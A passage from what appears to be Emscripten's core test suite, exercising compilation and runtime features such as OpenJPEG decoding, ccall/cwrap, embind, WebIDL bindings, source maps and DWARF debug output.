configure=['cmake', '.'],
# configure_args=['--enable-tiff=no', '--enable-jp3d=no', '--enable-png=no'],
make_args=[]) # no -j 2, since parallel builds can fail
# We use doubles in JS, so we get slightly different values than native code. So we
# check our output by comparing the average pixel difference
def image_compare(output):
# Get the image generated by JS, from the JSON.stringify'd array
m = re.search(r'\[[\d, -]*\]', output)
self.assertIsNotNone(m, 'Failed to find proper image output in: ' + output)
# Evaluate the output as a python array
js_data = eval(m.group(0))
js_data = [x if x >= 0 else 256 + x for x in js_data] # Our output may be signed, so unsign it
# Get the correct output
true_data = bytearray(read_binary(test_file('openjpeg/syntensity_lobby_s.raw')))
# Compare them
assert(len(js_data) == len(true_data))
num = len(js_data)
diff_total = js_total = true_total = 0
for i in range(num):
js_total += js_data[i]
true_total += true_data[i]
diff_total += abs(js_data[i] - true_data[i])
js_mean = js_total / float(num)
true_mean = true_total / float(num)
diff_mean = diff_total / float(num)
image_mean = 83.265
# print '[image stats:', js_mean, image_mean, true_mean, diff_mean, num, ']'
assert abs(js_mean - image_mean) < 0.01, [js_mean, image_mean]
assert abs(true_mean - image_mean) < 0.01, [true_mean, image_mean]
assert diff_mean < 0.01, diff_mean
return output
# Explictly disable EXIT_RUNTIME, since otherwise addOnPostRun does not work.
# https://github.com/emscripten-core/emscripten/issues/15080
self.set_setting('EXIT_RUNTIME', 0)
self.emcc_args += ['--minify=0'] # to compare the versions
self.emcc_args += ['--pre-js', 'pre.js']
def do_test():
self.do_runf(test_file('third_party/openjpeg/codec/j2k_to_image.c'),
'Successfully generated', # The real test for valid output is in image_compare
args='-i image.j2k -o image.raw'.split(),
emcc_args=['-sUSE_LIBPNG'],
libraries=lib,
includes=[test_file('third_party/openjpeg/libopenjpeg'),
test_file('third_party/openjpeg/codec'),
test_file('third_party/openjpeg/common'),
Path(self.get_build_dir(), 'third_party/openjpeg')],
output_nicerizer=image_compare)
do_test()
# extra testing
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1:
print('no memory growth', file=sys.stderr)
self.set_setting('ALLOW_MEMORY_GROWTH', 0)
do_test()
if is_sanitizing(self.emcc_args):
# In ASan mode we need a large initial memory (or else wasm-ld fails).
# The OpenJPEG CMake will build several executables (which we need parts
# of in our testing, see above), so we must enable the flag for them all.
with env_modify({'EMCC_CFLAGS': '-sINITIAL_MEMORY=300MB'}):
do_test_openjpeg()
else:
do_test_openjpeg()
@also_with_standalone_wasm(wasm2c=True, impure=True)
@no_asan('autodebug logging interferes with asan')
@with_env_modify({'EMCC_AUTODEBUG': '1'})
def test_autodebug_wasm(self):
# test that the program both works and also emits some of the logging
# (but without the specific output, as it is logging the actual locals
# used and so forth, which will change between opt modes and updates of
# llvm etc.)
def check(out):
for msg in ['log_execution', 'get_i32', 'set_i32', 'load_ptr', 'load_val', 'store_ptr', 'store_val']:
self.assertIn(msg, out)
return out
self.do_runf(test_file('core/test_autodebug.c'),
'success', output_nicerizer=check)
@parameterized({
'full': ('full',),
'mask': ('mask',),
'none': ('none',),
})
def test_wasm2c_sandboxing(self, mode):
if not can_do_standalone(self):
return self.skipTest('standalone mode not supported')
self.set_setting('STANDALONE_WASM')
self.set_setting('WASM2C')
self.set_setting('WASM2C_SANDBOXING', mode)
self.wasm_engines = []
self.do_core_test('test_hello_world.c')
### Integration tests
def test_ccall(self):
self.emcc_args.append('-Wno-return-stack-address')
self.set_setting('EXPORTED_RUNTIME_METHODS', ['ccall', 'cwrap'])
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('post.js', '''
out('*');
var ret;
ret = Module['ccall']('get_int', 'number'); out([typeof ret, ret].join(','));
ret = ccall('get_float', 'number'); out([typeof ret, ret.toFixed(2)].join(','));
ret = ccall('get_bool', 'boolean'); out([typeof ret, ret].join(','));
ret = ccall('get_string', 'string'); out([typeof ret, ret].join(','));
ret = ccall('print_int', null, ['number'], [12]); out(typeof ret);
ret = ccall('print_float', null, ['number'], [14.56]); out(typeof ret);
ret = ccall('print_bool', null, ['boolean'], [true]); out(typeof ret);
ret = ccall('print_string', null, ['string'], ["cheez"]); out(typeof ret);
ret = ccall('print_string', null, ['array'], [[97, 114, 114, 45, 97, 121, 0]]); out(typeof ret); // JS array
ret = ccall('print_string', null, ['array'], [new Uint8Array([97, 114, 114, 45, 97, 121, 0])]); out(typeof ret); // typed array
ret = ccall('multi', 'number', ['number', 'number', 'number', 'string'], [2, 1.4, 3, 'more']); out([typeof ret, ret].join(','));
var p = ccall('malloc', 'pointer', ['number'], [4]);
setValue(p, 650, 'i32');
ret = ccall('pointer', 'pointer', ['pointer'], [p]); out([typeof ret, getValue(ret, 'i32')].join(','));
out('*');
// part 2: cwrap
var noThirdParam = Module['cwrap']('get_int', 'number');
out(noThirdParam());
var multi = Module['cwrap']('multi', 'number', ['number', 'number', 'number', 'string']);
out(multi(2, 1.4, 3, 'atr'));
out(multi(8, 5.4, 4, 'bret'));
out('*');
// part 3: avoid stack explosion and check it's restored correctly
for (var i = 0; i < TOTAL_STACK/60; i++) {
ccall('multi', 'number', ['number', 'number', 'number', 'string'], [0, 0, 0, '123456789012345678901234567890123456789012345678901234567890']);
}
out('stack is ok.');
ccall('call_ccall_again', null);
''')
self.emcc_args += ['--post-js', 'post.js']
self.set_setting('EXPORTED_FUNCTIONS', ['_get_int', '_get_float', '_get_bool', '_get_string', '_print_int', '_print_float', '_print_bool', '_print_string', '_multi', '_pointer', '_call_ccall_again', '_malloc'])
self.do_core_test('test_ccall.cpp')
if self.maybe_closure():
self.do_core_test('test_ccall.cpp')
def test_EXPORTED_RUNTIME_METHODS(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$dynCall'])
self.do_core_test('EXPORTED_RUNTIME_METHODS.c')
# test dyncall (and other runtime methods in support.js) can be exported
self.emcc_args += ['-DEXPORTED']
self.set_setting('EXPORTED_RUNTIME_METHODS', ['dynCall', 'addFunction', 'lengthBytesUTF8', 'getTempRet0', 'setTempRet0'])
self.do_core_test('EXPORTED_RUNTIME_METHODS.c')
@parameterized({
'': [],
'minimal_runtime': ['-sMINIMAL_RUNTIME=1']
})
def test_dyncall_specific(self, *args):
cases = [
('DIRECT', []),
('DYNAMIC_SIG', ['-sDYNCALLS=1', '-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=$dynCall']),
]
if '-sMINIMAL_RUNTIME=1' in args:
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
else:
cases += [
('EXPORTED', []),
('EXPORTED_DYNAMIC_SIG', ['-sDYNCALLS=1', '-sDEFAULT_LIBRARY_FUNCS_TO_INCLUDE=$dynCall', '-sEXPORTED_RUNTIME_METHODS=dynCall']),
('FROM_OUTSIDE', ['-sEXPORTED_RUNTIME_METHODS=dynCall_iiji'])
]
for which, extra_args in cases:
print(str(args) + ' ' + which)
self.do_core_test('dyncall_specific.c', emcc_args=['-D' + which] + list(args) + extra_args)
def test_getValue_setValue(self):
# these used to be exported, but no longer are by default
def test(output_prefix='', args=[], assert_returncode=0):
src = test_file('core/getValue_setValue.cpp')
expected = test_file('core/getValue_setValue' + output_prefix + '.out')
self.do_run_from_file(src, expected, assert_returncode=assert_returncode, emcc_args=args)
# see that direct usage (not on module) works. we don't export, but the use
# keeps it alive through JSDCE
test(args=['-DDIRECT'])
# see that with assertions, we get a nice error message
self.set_setting('EXPORTED_RUNTIME_METHODS', [])
self.set_setting('ASSERTIONS')
test('_assert', assert_returncode=NON_ZERO)
self.set_setting('ASSERTIONS', 0)
# see that when we export them, things work on the module
self.set_setting('EXPORTED_RUNTIME_METHODS', ['getValue', 'setValue'])
test()
@parameterized({
'': ([],),
'_files': (['-DUSE_FILES'],)
})
def test_FS_exports(self, extra_args):
# these used to be exported, but no longer are by default
def test(output_prefix='', args=[], assert_returncode=0):
args += extra_args
print(args)
self.do_runf(test_file('core/FS_exports.cpp'),
(read_file(test_file('core/FS_exports' + output_prefix + '.out')),
read_file(test_file('core/FS_exports' + output_prefix + '_2.out'))),
assert_returncode=assert_returncode, emcc_args=args)
# see that direct usage (not on module) works. we don't export, but the use
# keeps it alive through JSDCE
test(args=['-DDIRECT', '-sFORCE_FILESYSTEM'])
# see that with assertions, we get a nice error message
self.set_setting('EXPORTED_RUNTIME_METHODS', [])
self.set_setting('ASSERTIONS')
test('_assert', assert_returncode=NON_ZERO)
self.set_setting('ASSERTIONS', 0)
# see that when we export them, things work on the module
self.set_setting('EXPORTED_RUNTIME_METHODS', ['FS_createDataFile'])
test(args=['-sFORCE_FILESYSTEM'])
def test_legacy_exported_runtime_numbers(self):
# these used to be exported, but no longer are by default
def test(output_prefix='', args=[], assert_returncode=0):
old = self.emcc_args.copy()
self.emcc_args += args
src = test_file('core/legacy_exported_runtime_numbers.cpp')
expected = test_file('core/legacy_exported_runtime_numbers%s.out' % output_prefix)
self.do_run_from_file(src, expected, assert_returncode=assert_returncode)
self.emcc_args = old
# see that direct usage (not on module) works. we don't export, but the use
# keeps it alive through JSDCE
test(args=['-DDIRECT'])
# see that with assertions, we get a nice error message
self.set_setting('EXPORTED_RUNTIME_METHODS', [])
self.set_setting('ASSERTIONS')
test('_assert', assert_returncode=NON_ZERO)
self.set_setting('ASSERTIONS', 0)
# see that when we export them, things work on the module
self.set_setting('EXPORTED_RUNTIME_METHODS', ['ALLOC_STACK'])
test()
def test_response_file(self):
response_data = '-o %s/response_file.js %s' % (self.get_dir(), test_file('hello_world.cpp'))
create_file('rsp_file', response_data.replace('\\', '\\\\'))
self.run_process([EMCC, "@rsp_file"] + self.get_emcc_args())
self.do_run('response_file.js', 'hello, world', no_build=True)
self.assertContained('response file not found: foo.txt', self.expect_fail([EMCC, '@foo.txt']))
def test_linker_response_file(self):
objfile = 'response_file.o'
self.run_process([EMCC, '-c', test_file('hello_world.cpp'), '-o', objfile] + self.get_emcc_args(ldflags=False))
# This should expand into -Wl,--start-group <objfile> -Wl,--end-group
response_data = '--start-group ' + objfile + ' --end-group'
create_file('rsp_file', response_data.replace('\\', '\\\\'))
self.run_process([EMCC, "-Wl,@rsp_file", '-o', 'response_file.o.js'] + self.get_emcc_args())
self.do_run('response_file.o.js', 'hello, world', no_build=True)
def test_exported_response(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <emscripten.h>
extern "C" {
int other_function() { return 5; }
}
int main() {
int x = EM_ASM_INT({ return Module._other_function() });
emscripten_run_script_string(""); // Add a reference to a symbol that exists in src/deps_info.json to uncover issue #2836 in the test suite.
printf("waka %d!\n", x);
return 0;
}
'''
create_file('exps', '["_main","_other_function"]')
self.set_setting('EXPORTED_FUNCTIONS', '@exps')
self.do_run(src, '''waka 5!''')
assert 'other_function' in read_file('src.js')
def test_large_exported_response(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <emscripten.h>
extern "C" {
'''
js_funcs = []
num_exports = 5000
count = 0
while count < num_exports:
src += 'int exported_func_from_response_file_%d () { return %d;}\n' % (count, count)
js_funcs.append('_exported_func_from_response_file_%d' % count)
count += 1
src += r'''
}
int main() {
int x = EM_ASM_INT({ return Module._exported_func_from_response_file_4999() });
emscripten_run_script_string(""); // Add a reference to a symbol that exists in src/deps_info.json to uncover issue #2836 in the test suite.
printf("waka %d!\n", x);
return 0;
}
'''
js_funcs.append('_main')
create_file('large_exported_response.json', json.dumps(js_funcs))
self.set_setting('EXPORTED_FUNCTIONS', '@large_exported_response.json')
self.do_run(src, 'waka 4999!')
self.assertContained('_exported_func_from_response_file_1', read_file('src.js'))
@no_memory64('gives: TypeError: WebAssembly.Table.set(): Argument 1 must be null or a WebAssembly function')
def test_add_function(self):
self.set_setting('INVOKE_RUN', 0)
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.set_setting('RESERVED_FUNCTION_POINTERS')
self.set_setting('EXPORTED_RUNTIME_METHODS', ['callMain'])
src = test_file('interop/test_add_function.cpp')
post_js = test_file('interop/test_add_function_post.js')
self.emcc_args += ['--post-js', post_js]
print('basics')
self.do_run_in_out_file_test('interop/test_add_function.cpp')
print('with RESERVED_FUNCTION_POINTERS=0')
self.set_setting('RESERVED_FUNCTION_POINTERS', 0)
expected = 'Unable to grow wasm table'
if self.is_wasm2js():
# in wasm2js the error message doesn't come from the VM, but from our
# emulation code. when ASSERTIONS are enabled we show a clear message, but
# in optimized builds we don't waste code size on that, and the JS engine
# shows a generic error.
expected = 'wasmTable.grow is not a function'
self.do_runf(src, expected, assert_returncode=NON_ZERO)
print('- with table growth')
self.set_setting('ALLOW_TABLE_GROWTH')
self.emcc_args += ['-DGROWTH']
# enable costly assertions to verify correct table behavior
self.set_setting('ASSERTIONS', 2)
self.do_run_in_out_file_test('interop/test_add_function.cpp', interleaved_output=False)
def test_getFuncWrapper_sig_alias(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$getFuncWrapper'])
src = r'''
#include <stdio.h>
#include <emscripten.h>
void func1(int a) {
printf("func1\n");
}
void func2(int a, int b) {
printf("func2\n");
}
int main() {
EM_ASM({
getFuncWrapper($0, 'vi')(0);
getFuncWrapper($1, 'vii')(0, 0);
}, func1, func2);
return 0;
}
'''
self.do_run(src, 'func1\nfunc2\n')
def test_emulate_function_pointer_casts(self):
# Forcibly disable EXIT_RUNTIME due to:
# https://github.com/emscripten-core/emscripten/issues/15081
self.set_setting('EXIT_RUNTIME', 0)
self.set_setting('EMULATE_FUNCTION_POINTER_CASTS')
self.do_core_test('test_emulate_function_pointer_casts.cpp')
@no_wasm2js('TODO: nicely printed names in wasm2js')
@parameterized({
'normal': ([],),
'noexcept': (['-fno-exceptions'],)
})
def test_demangle_stacks(self, extra_args):
self.emcc_args += extra_args
self.set_setting('DEMANGLE_SUPPORT')
self.set_setting('ASSERTIONS')
# disable aggressive inlining in binaryen
self.set_setting('BINARYEN_EXTRA_PASSES', '--one-caller-inline-max-function-size=1')
# ensure function names are preserved
self.emcc_args += ['--profiling-funcs']
self.do_core_test('test_demangle_stacks.cpp', assert_returncode=NON_ZERO)
# there should be a name section in the file
self.assertTrue(webassembly.Module('test_demangle_stacks.wasm').has_name_section())
print('without assertions, the stack is not printed, but a message suggesting assertions is')
self.set_setting('ASSERTIONS', 0)
self.do_core_test('test_demangle_stacks_noassert.cpp', assert_returncode=NON_ZERO)
def test_demangle_stacks_symbol_map(self):
# disable aggressive inlining in binaryen
self.set_setting('BINARYEN_EXTRA_PASSES', '--one-caller-inline-max-function-size=1')
self.set_setting('DEMANGLE_SUPPORT')
if '-O' not in str(self.emcc_args) or '-O0' in self.emcc_args or '-O1' in self.emcc_args or '-g' in self.emcc_args:
self.skipTest("without opts, we don't emit a symbol map")
self.emcc_args += ['--emit-symbol-map']
self.do_runf(test_file('core/test_demangle_stacks.cpp'), 'Aborted', assert_returncode=NON_ZERO)
# make sure the shortened name is the right one
full_aborter = None
short_aborter = None
for line in open('test_demangle_stacks.js.symbols').readlines():
if ':' not in line:
continue
# split by the first ':' (wasm backend demangling may include more :'s later on)
short, full = line.split(':', 1)
if 'Aborter' in full:
short_aborter = short
full_aborter = full
self.assertIsNotNone(full_aborter)
self.assertIsNotNone(short_aborter)
print('full:', full_aborter, 'short:', short_aborter)
if config.SPIDERMONKEY_ENGINE and os.path.exists(config.SPIDERMONKEY_ENGINE[0]):
output = self.run_js('test_demangle_stacks.js', engine=config.SPIDERMONKEY_ENGINE, assert_returncode=NON_ZERO)
# we may see the full one, if -g, or the short one if not
if ' ' + short_aborter + ' ' not in output and ' ' + full_aborter + ' ' not in output:
# stack traces may also be ' name ' or 'name@' etc
if '\n' + short_aborter + ' ' not in output and '\n' + full_aborter + ' ' not in output and 'wasm-function[' + short_aborter + ']' not in output:
if '\n' + short_aborter + '@' not in output and '\n' + full_aborter + '@' not in output:
self.assertContained(' ' + short_aborter + ' ' + '\n' + ' ' + full_aborter + ' ', output)
@no_safe_heap('tracing from sbrk into JS leads to an infinite loop')
def test_tracing(self):
self.emcc_args += ['--tracing']
self.do_core_test('test_tracing.c')
@no_wasm2js('eval_ctors not supported yet')
@also_with_standalone_wasm()
def test_eval_ctors(self):
if '-O2' not in str(self.emcc_args) or '-O1' in str(self.emcc_args):
self.skipTest('need opts')
print('leave printf in ctor')
self.set_setting('EVAL_CTORS')
self.do_run(r'''
#include <stdio.h>
struct C {
C() { printf("constructing!\n"); } // don't remove this!
};
C c;
int main() {}
''', "constructing!\n")
def do_test(test, level=1, prefix='src'):
def get_code_size():
if self.is_wasm():
# this also includes the memory, but it is close enough for our
# purposes
return self.measure_wasm_code_lines(prefix + '.wasm')
else:
return os.path.getsize(prefix + '.js')
self.set_setting('EVAL_CTORS', level)
test()
ec_code_size = get_code_size()
self.clear_setting('EVAL_CTORS')
test()
code_size = get_code_size()
print('code:', code_size, '=>', ec_code_size)
self.assertLess(ec_code_size, code_size)
print('remove ctor of just assigns to memory')
def test1():
self.do_run(r'''
#include <stdio.h>
struct C {
int x;
C() {
volatile int y = 10;
y++;
x = y;
}
};
C c;
int main() {
printf("x: %d\n", c.x);
}
''', "x: 11\n")
do_test(test1)
print('libcxx - remove 2 ctors from iostream code')
output = 'hello, world!'
def test2():
self.do_runf(test_file('hello_libcxx.cpp'), output)
# in standalone more there is more usage of WASI APIs, which mode 2 is
# needed to avoid in order to fully optimize, so do not test mode 1 in
# that mode.
if not self.get_setting('STANDALONE_WASM'):
do_test(test2, level=1, prefix='hello_libcxx')
do_test(test2, level=2, prefix='hello_libcxx')
def test_embind(self):
# Very that both the old `--bind` arg and the new `-lembind` arg work
for args in [['-lembind'], ['--bind']]:
create_file('test_embind.cpp', r'''
#include <stdio.h>
#include <emscripten/val.h>
using namespace emscripten;
int main() {
val Math = val::global("Math");
// two ways to call Math.abs
printf("abs(-10): %d\n", Math.call<int>("abs", -10));
printf("abs(-11): %d\n", Math["abs"](-11).as<int>());
return 0;
}
''')
self.do_runf('test_embind.cpp', 'abs(-10): 10\nabs(-11): 11', emcc_args=args)
def test_embind_2(self):
self.emcc_args += ['-lembind', '--post-js', 'post.js']
create_file('post.js', '''
function printLerp() {
out('lerp ' + Module.lerp(100, 200, 66) + '.');
}
''')
create_file('test_embind_2.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
#include <emscripten/bind.h>
using namespace emscripten;
int lerp(int a, int b, int t) {
return (100 - t) * a + t * b;
}
EMSCRIPTEN_BINDINGS(my_module) {
function("lerp", &lerp);
}
int main(int argc, char **argv) {
EM_ASM(printLerp());
return 0;
}
''')
self.do_runf('test_embind_2.cpp', 'lerp 166')
def test_embind_3(self):
self.emcc_args += ['-lembind', '--post-js', 'post.js']
create_file('post.js', '''
function ready() {
try {
Module.compute(new Uint8Array([1,2,3]));
} catch(e) {
out(e);
}
}
''')
create_file('test_embind_3.cpp', r'''
#include <emscripten.h>
#include <emscripten/bind.h>
using namespace emscripten;
int compute(int array[]) {
return 0;
}
EMSCRIPTEN_BINDINGS(my_module) {
function("compute", &compute, allow_raw_pointers());
}
int main(int argc, char **argv) {
EM_ASM(ready());
return 0;
}
''')
self.do_runf('test_embind_3.cpp', 'UnboundTypeError: Cannot call compute due to unbound types: Pi')
def test_embind_4(self):
self.emcc_args += ['-lembind', '--post-js', 'post.js']
create_file('post.js', '''
function printFirstElement() {
out(Module.getBufferView()[0]);
}
''')
create_file('test_embind_4.cpp', r'''
#include <emscripten.h>
#include <emscripten/bind.h>
#include <emscripten/val.h>
#include <stdio.h>
using namespace emscripten;
const size_t kBufferSize = 1024;
double buffer[kBufferSize];
val getBufferView(void) {
val v = val(typed_memory_view(kBufferSize, buffer));
return v;
}
EMSCRIPTEN_BINDINGS(my_module) {
function("getBufferView", &getBufferView);
}
int main(int argc, char **argv) {
buffer[0] = 107;
EM_ASM(printFirstElement());
return 0;
}
''')
self.do_runf('test_embind_4.cpp', '107')
def test_embind_5(self):
self.emcc_args += ['-lembind']
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_embind_5.cpp')
def test_embind_custom_marshal(self):
self.emcc_args += ['-lembind', '--pre-js', test_file('embind/test_custom_marshal.js')]
self.do_run_in_out_file_test('embind/test_custom_marshal.cpp', assert_identical=True)
def test_embind_float_constants(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_float_constants.cpp')
def test_embind_negative_constants(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_negative_constants.cpp')
@also_with_wasm_bigint
def test_embind_unsigned(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_unsigned.cpp')
def test_embind_val(self):
self.emcc_args += ['-lembind']
self.do_run_in_out_file_test('embind/test_val.cpp')
def test_embind_val_assignment(self):
err = self.expect_fail([EMCC, test_file('embind/test_val_assignment.cpp'), '-lembind', '-c'])
self.assertContained('candidate function not viable: expects an lvalue for object argument', err)
@no_wasm2js('wasm_bigint')
def test_embind_i64_val(self):
self.set_setting('WASM_BIGINT')
self.emcc_args += ['-lembind']
self.node_args += ['--experimental-wasm-bigint']
self.do_run_in_out_file_test('embind/test_i64_val.cpp', assert_identical=True)
@no_wasm2js('wasm_bigint')
def test_embind_i64_binding(self):
self.set_setting('WASM_BIGINT')
self.emcc_args += ['-lembind']
self.node_args += ['--experimental-wasm-bigint']
self.do_run_in_out_file_test('embind/test_i64_binding.cpp', assert_identical=True)
def test_embind_no_rtti(self):
create_file('main.cpp', r'''
#include <emscripten.h>
#include <emscripten/bind.h>
#include <emscripten/val.h>
#include <stdio.h>
EM_JS(void, calltest, (), {
console.log("dotest returned: " + Module.dotest());
});
int main(int argc, char** argv){
printf("418\n");
calltest();
return 0;
}
int test() {
return 42;
}
EMSCRIPTEN_BINDINGS(my_module) {
emscripten::function("dotest", &test);
}
''')
self.emcc_args += ['-lembind', '-fno-rtti', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']
self.do_runf('main.cpp', '418\ndotest returned: 42\n')
def test_embind_polymorphic_class_no_rtti(self):
self.emcc_args += ['-lembind', '-fno-rtti', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']
self.do_core_test('test_embind_polymorphic_class_no_rtti.cpp')
def test_embind_no_rtti_followed_by_rtti(self):
src = r'''
#include <emscripten.h>
#include <emscripten/bind.h>
#include <emscripten/val.h>
#include <stdio.h>
EM_JS(void, calltest, (), {
console.log("dotest returned: " + Module.dotest());
});
int main(int argc, char** argv){
printf("418\n");
calltest();
return 0;
}
int test() {
return 42;
}
EMSCRIPTEN_BINDINGS(my_module) {
emscripten::function("dotest", &test);
}
'''
self.emcc_args += ['-lembind', '-fno-rtti', '-frtti']
self.do_run(src, '418\ndotest returned: 42\n')
@parameterized({
'': (None, False),
'all': ('ALL', False),
'fast': ('FAST', False),
'default': ('DEFAULT', False),
'all_growth': ('ALL', True),
})
def test_webidl(self, mode, allow_memory_growth):
self.uses_es6 = True
# TODO(): Remove once we make webidl output closure-warning free.
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
self.set_setting('WASM_ASYNC_COMPILATION', 0)
if self.maybe_closure():
# avoid closure minified names competing with our test code in the global name space
self.set_setting('MODULARIZE')
else:
self.set_setting('WASM_ASYNC_COMPILATION', 0)
# Force IDL checks mode
with env_modify({'IDL_CHECKS': mode}):
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
post_js = '\n\n'
if self.get_setting('MODULARIZE'):
post_js += 'var TheModule = Module();\n'
else:
post_js += 'var TheModule = Module;\n'
post_js += '\n\n'
if allow_memory_growth:
post_js += "var isMemoryGrowthAllowed = true;\n"
else:
post_js += "var isMemoryGrowthAllowed = false;\n"
post_js += read_file(test_file('webidl/post.js'))
post_js += '\n\n'
create_file('extern-post.js', post_js)
# Export things on "TheModule". This matches the typical use pattern of the bound library
# being used as Box2D.* or Ammo.*, and we cannot rely on "Module" being always present (closure may remove it).
self.emcc_args += ['-sEXPORTED_FUNCTIONS=_malloc,_free', '--post-js=glue.js', '--extern-post-js=extern-post.js']
if mode == 'ALL':
self.emcc_args += ['-sASSERTIONS']
if allow_memory_growth:
self.set_setting('ALLOW_MEMORY_GROWTH')
if not mode:
mode = 'DEFAULT'
expected = test_file('webidl/output_%s.txt' % mode)
self.do_run_from_file(test_file('webidl/test.cpp'), expected)
### Tests for tools
@no_wasm2js('TODO: source maps in wasm2js')
@parameterized({
'': ([],),
'minimal_runtime': (['-sMINIMAL_RUNTIME'],),
})
def test_source_map(self, args):
if '-g' not in self.emcc_args:
self.emcc_args.append('-g')
self.emcc_args += args
src = '''
#include <stdio.h>
#include <assert.h>
__attribute__((noinline)) int foo() {
printf("hi"); // line 6
return 1; // line 7
}
int main() {
printf("%d", foo()); // line 11
return 0; // line 12
}
'''
create_file('src.cpp', src)
out_filename = 'a.out.js'
wasm_filename = 'a.out.wasm'
no_maps_filename = 'no-maps.out.js'
assert '-gsource-map' not in self.emcc_args
self.emcc('src.cpp', self.get_emcc_args(), out_filename)
# the file name may find its way into the generated code, so make sure we
# can do an apples-to-apples comparison by compiling with the same file name
shutil.move(out_filename, no_maps_filename)
no_maps_file = read_file(no_maps_filename)
no_maps_file = re.sub(' *//[@#].*$', '', no_maps_file, flags=re.MULTILINE)
self.emcc_args.append('-gsource-map')
self.emcc(os.path.abspath('src.cpp'),
self.get_emcc_args(),
out_filename)
map_referent = out_filename if not self.is_wasm() else wasm_filename
# after removing the @line and @sourceMappingURL comments, the build
# result should be identical to the non-source-mapped debug version.
# this is worth checking because the parser AST swaps strings for token
# objects when generating source maps, so we want to make sure the
# optimizer can deal with both types.
map_filename = map_referent + '.map'
data = json.load(open(map_filename))
if hasattr(data, 'file'):
# the file attribute is optional, but if it is present it needs to refer
# the output file.
self.assertPathsIdentical(map_referent, data['file'])
self.assertGreater(len(data['sources']), 1)
self.assertContained('src.cpp', data['sources'])
src_index = data['sources'].index('src.cpp')
if hasattr(data, 'sourcesContent'):
# the sourcesContent attribute is optional, but if it is present it
# needs to containt valid source text.
self.assertTextDataIdentical(src, data['sourcesContent'][src_index])
mappings = json.loads(self.run_js(
path_from_root('tests/sourcemap2json.js'),
args=[map_filename]))
seen_lines = set()
for m in mappings:
if m['source'] == 'src.cpp':
seen_lines.add(m['originalLine'])
# ensure that all the 'meaningful' lines in the original code get mapped
# when optimizing, the binaryen optimizer may remove some of them (by inlining, etc.)
if self.is_optimizing():
self.assertTrue(seen_lines.issuperset([11, 12]), seen_lines)
else:
self.assertTrue(seen_lines.issuperset([6, 7, 11, 12]), seen_lines)
@no_wasm2js('TODO: source maps in wasm2js')
def test_dwarf(self):
self.emcc_args.append('-g')
js_filename = 'a.out.js'
wasm_filename = 'a.out.wasm'
shutil.copyfile(test_file('core/test_dwarf.c'), 'test_dwarf.c')
self.emcc('test_dwarf.c', self.get_emcc_args(), js_filename)
out = self.run_process([shared.LLVM_DWARFDUMP, wasm_filename, '-all'], stdout=PIPE).stdout
# parse the sections
sections = {}
curr_section_name = ''
curr_section_body = ''
def add_section():
if curr_section_name:
sections[curr_section_name] = curr_section_body
for line in out.splitlines():
if ' contents:' in line:
# a new section, a line like ".debug_str contents:"
add_section()
curr_section_name = line.split(' ')[0]
curr_section_body = ''
else:
# possibly a line in a section
if curr_section_name:
curr_section_body += line + '\n'
add_section()
# make sure the right sections exist
self.assertIn('.debug_abbrev', sections)
self.assertIn('.debug_info', sections)
self.assertIn('.debug_line', sections)
self.assertIn('.debug_str', sections)
self.assertIn('.debug_ranges', sections)
# verify some content in the sections
self.assertIn('"test_dwarf.c"', sections['.debug_info'])
# the line section looks like this:
# Address Line Column File ISA Discriminator Flags
# ------------------ ------ ------ ------ --- ------------- -------------
# 0x000000000000000b 5 0 3 0 0 is_stmt
src_to_addr = {}
found_dwarf_c = False
for line in sections['.debug_line'].splitlines():
if 'name: "test_dwarf.c"' in line:
found_dwarf_c = True
if not found_dwarf_c:
continue
if 'debug_line' in line:
break
if line.startswith('0x'):
while ' ' in line:
line = line.replace(' ', ' ')
addr, line, col = line.split(' ')[:3]
key = (int(line), int(col))
src_to_addr.setdefault(key, []).append(addr)
# each of the calls must remain in the binary, and be mapped
self.assertIn((6, 3), src_to_addr)
self.assertIn((7, 3), src_to_addr)
self.assertIn((8, 3), src_to_addr)
def get_dwarf_addr(line, col):
addrs = src_to_addr[(line, col)]
# we assume the simple calls have one address
self.assertEqual(len(addrs), 1)
return int(addrs[0], 0)
# the lines must appear in sequence (as calls to JS, the optimizer cannot
# reorder them)
self.assertLess(get_dwarf_addr(6, 3), get_dwarf_addr(7, 3))
self.assertLess(get_dwarf_addr(7, 3), get_dwarf_addr(8, 3))
# Get the wat, printing with -g which has binary offsets
wat = self.run_process([Path(building.get_binaryen_bin(), 'wasm-opt'),
wasm_filename, '-g', '--print'], stdout=PIPE).stdout
# We expect to see a pattern like this in optimized builds (there isn't
# much that can change with such calls to JS (they can't be reordered or
# anything else):
#
# ;; code offset: 0x?
# (drop
# ;; code offset: 0x?
# (call $out_to_js
# ;; code offset: 0x?
# (local.get ?) or (i32.const ?)
# )
# )
#
# In the stacky stream of instructions form, it is
#
# local.get or i32.const
# call $out_to_js
# drop
#
# However, in an unoptimized build the constant may be assigned earlier in
# some other manner, so stop here.
if not self.is_optimizing():
return
# get_wat_addr gets the address of one of the 3 interesting calls, by its
# index (0,1,2).
def get_wat_addr(call_index):
# find the call_index-th call
call_loc = -1
for i in range(call_index + 1):
call_loc = wat.find('call $out_to_js', call_loc + 1)
assert call_loc > 0
# the call begins with the local.get/i32.const printed below it, which is
# the first instruction in the stream, so it has the lowest address
start_addr_loc = wat.find('0x', call_loc)
assert start_addr_loc > 0
start_addr_loc_end = wat.find('\n', start_addr_loc)
start_addr = int(wat[start_addr_loc:start_addr_loc_end], 0)
